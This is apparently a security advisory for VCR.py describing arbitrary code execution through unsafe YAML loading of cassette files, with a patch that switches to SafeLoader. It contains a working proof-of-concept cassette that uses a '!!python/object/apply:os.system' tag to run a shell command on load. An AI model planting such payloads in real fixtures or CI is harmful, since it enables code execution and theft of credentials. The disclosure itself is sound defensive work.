GHSA-rpj2-4hq8-938g
VCR.py: Arbitrary code execution via unsafe YAML deserialization of cassette files
상세
### Summary
vcrpy deserializes YAML cassette files with PyYAML's object-constructing loader (`yaml.CLoader` / `yaml.Loader`) instead of the safe loader (`yaml.CSafeLoader` / `yaml.SafeLoader`). A cassette containing a `!!python/object/apply:` (or similar) tag therefore executes arbitrary Python code the moment the cassette is loaded — including through the normal `VCR().use_cassette()` path, before any HTTP interaction is replayed.
This is **not** limited to environments lacking the libYAML C extension. `CLoader` uses the C parser but PyYAML's full Python *constructor*, so Python object tags execute under `CLoader` exactly as under the pure-Python `Loader`. Confirmed against vcrpy 8.1.1 + PyYAML 6.0.3 with `CLoader` active.
### Affected component
- `vcr/serializers/yamlserializer.py` — `deserialize()` → `yaml.load(cassette_string, Loader=Loader)` where `Loader` is `CLoader`/`Loader`. Reached on **every** cassette load. - `vcr/migration.py` (~line 107) — `yaml.load(preprocess_yaml(...), Loader=Loader)`. A second sink reached when the migration tool is run on a `.yaml` file. `preprocess_yaml()` only strips three known legacy tags, so other tags still execute.
Present in all releases inspected, 1.0.0 through 8.1.1.
### Proof of concept
```python import vcr, requests
# Attacker-supplied cassette. The payload sits in an ignored top-level key # so the rest of the cassette stays valid; it fires during load. open("evil.yaml", "w").write("""interactions: - request: body: null headers: {Accept: ['*/*']} method: GET uri: http://example.com/ response: body: {string: ok} headers: {Content-Type: ['text/plain']} status: {code: 200, message: OK} _x: !!python/object/apply:os.system ['touch /tmp/VCRPY_YAML_RCE'] version: 1 """)
with vcr.use_cassette("evil.yaml"): # <-- /tmp/VCRPY_YAML_RCE created here requests.get("http://example.com/") ```
Loading the cassette creates `/tmp/VCRPY_YAML_RCE`, demonstrating arbitrary command execution. Any Python callable can be invoked this way.
### Impact
Arbitrary code execution in the process that loads the cassette, with that process's full privileges. Realistic delivery paths:
- A malicious cassette added in a pull request and loaded when CI runs the tests. - A poisoned shared test-fixture repository or cassette artifact store. - "Updated recorded HTTP fixtures" social-engineering.
Because cassettes are typically loaded by test suites in CI/CD and on developer machines, the exposed secrets are exactly the high-value ones in those environments: CI deployment credentials, cloud IAM roles, registry/publishing tokens, and source access.
### Patch
Use the safe loader in `vcr/serializers/yamlserializer.py`:
```python try: from yaml import CDumper as Dumper from yaml import CSafeLoader as Loader except ImportError: from yaml import Dumper from yaml import SafeLoader as Loader
def deserialize(cassette_string): return yaml.load(cassette_string, Loader=Loader) ```
Apply the same `SafeLoader` change in `vcr/migration.py`.
This is backwards compatible: vcrpy cassettes only contain standard YAML (scalars/lists/maps plus `!!binary`, all supported by `SafeLoader`/`CSafeLoader`), so existing cassettes load unchanged. vcrpy's `serialize.deserialize()` already catches `yaml.constructor.ConstructorError`, so a Python-tagged cassette now surfaces as the existing "old cassette format" `ValueError` instead of executing.
Recommended hardening: add a regression test that loads a cassette containing `!!python/object/apply:os.system` and asserts a `ConstructorError`/`ValueError` and that no side effect occurs.
이 버전이 영향받나요?
사용 중인 패키지 버전을 입력하면 즉시 평가합니다.